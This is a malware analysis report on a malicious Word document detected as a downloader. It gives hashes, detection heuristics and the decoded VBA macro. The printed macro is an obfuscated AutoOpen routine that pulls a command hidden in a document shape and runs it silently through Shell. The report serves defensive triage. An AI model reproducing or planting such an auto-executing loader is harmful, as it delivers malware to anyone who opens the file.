Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e8e03a1d179cec3f…

MALICIOUS

Office (OLE)

Size: 77.2 KB
Created: 2018-11-23 05:41:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 55e8ba1c7c89854e3727e5e04ea9558e
SHA-1: 0282dc8b0891d9dc14fb17ec9c1e420273fc910d
SHA-256: e8e03a1d179cec3fd9bf6dc4b3b9cef35ef6d68cf0ea936702f8764b9c19a1c0
Risk score: 152

Heuristics (7)

  • ClamAV: Doc.Downloader.Sagent-6770337-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-6770337-0
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2833 bytes
SHA-256: dd7a9197df976d7b6d1e931a0cb02f98de10dadf859172f8b22769db04b40d3d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
86 of 139 identifiers look randomly generated (e.g. 'aRhijomXKlQIfr'), which is consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "aRhijomXKlQIfr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      If JkTvk <= KNvZEu Then
      Set ODpVS = FdOuZrz
jQRjDnhcS = DMCiuaX
       Set wVEjiqM = dcupu
 Set lNiwi = AGXmkRRGS
 Set inXBtdt = ibTBJEhdc
   End If
Set pAwwiXr = Shapes("hXoslCRZmvQ")
   On Error Resume Next
      If KLVllihs <= zfELkIJhz Then
      Set XTqAk = FafwbOw
HmrXKwK = MESvIR
       Set CPAjPzW = LlQfDB
 Set WijhEwRmX = qFGmhoMoz
 Set hbfjXlT = mtSGPPhk
   End If
   On Error Resume Next
      If FYufMpbHa <= bJPZP Then
      Set drcwA = jqIfwF
MHFAznF = wPMqv
       Set MfAKkTip = tnturEX
 Set tVfOwWIR = KAibPFEY
 Set KHULmt = cMNEsND
   End If
GnclDIpzza = "" + jdwErE + clcdkZ + vCCJSi + pAwwiXr.TextFrame.TextRange.Text + dfjpr + clbWrEzv
   On Error Resume Next
      If DZzmniORO <= HCWvIXrqW Then
      Set Bjisq = XAkEpF
QtfJOE = kRaEV
       Set qBuXiD = cwUuHvWL
 Set hKECmF = dOdlN
 Set kJaWcZ = GNZmToU
   End If
   On Error Resume Next
      If VwfJOQR <= kHOPfikdz Then
      Set YwqMHLK = uhSHUS
MvmSbO = vMUHilO
       Set SXqzRIhJo = zzVjjc
 Set vzSmwKXI = AirzcYCDP
 Set RUBHimzwb = HLfrTm
   End If
   On Error Resume Next
      If EUAWw <= SERJDqnU Then
      Set DNoOqMi = GvVzzETiw
AtahbfwhX = zCJiU
       Set qSMiEu = ctachUz
 Set iGAmazWlI = IpasEl
 Set ijOBSSlG = znBDRN
   End If
   On Error Resume Next
      If QazLXVWLT <= pobOmz Then
      Set TSLAI = hIQBw
JpjAQiFz = KoRsNnBd
       Set DhjSXJmp = UQDGT
 Set cKVFoKj = zZJdtHuR
 Set iczRzqRa = bWkicD
   End If
Interaction.Shell! GnclDIpzza, 0
   On Error Resume Next
      If iXLaizjLJ <= MSaGLNGz Then
      Set DmMPzMr = nlwCCHKkH
mjKoi = PhMMvc
       Set ATccKSION = zvZNmJKPW
 Set IUQKO = wAQAi
 Set Lqvja = zSzqZrK
   End If
   On Error Resume Next
      If rsMiOIWiY <= WhVSUliR Then
      Set AUkEOiTwf = YaOSF
ZitlNj = zEcAIV
       Set dAqZzdGo = zvMqfANHO
 Set DuCkjd = ElzmdK
 Set wZXjpVb = lluqB
   End If
   On Error Resume Next
      If CzvpZJTzt <= dikOTR Then
      Set KOhWK = hIXTS
Qtkpbaok = oZaAMw
       Set zwNnCDX = zaroOjC
 Set AKcUspJni = oWpGVzMC
 Set ZGfmN = NrAiAVj
   End If
   On Error Resume Next
      If mwaYF <= wfVMCt Then
      Set WfIZT = AGijsi
dmHWFY = mJNrS
       Set MjnRwQwN = cphFarvD
 Set hunlKX = HdsSMSRGj
 Set TSQkc = EsJRozwJ
   End If
   On Error Resume Next
      If NwMNOY <= KHItOlRj Then
      Set wQzlhLhMz = bpcwjZ
pnlYsjXj = Qzibw
       Set LWQnpPkBQ = NwzwiJZUj
 Set dwYFhcFZv = dXTiiFiw
 Set PElUYimZ = ZHaOsCSM
   End If
End Sub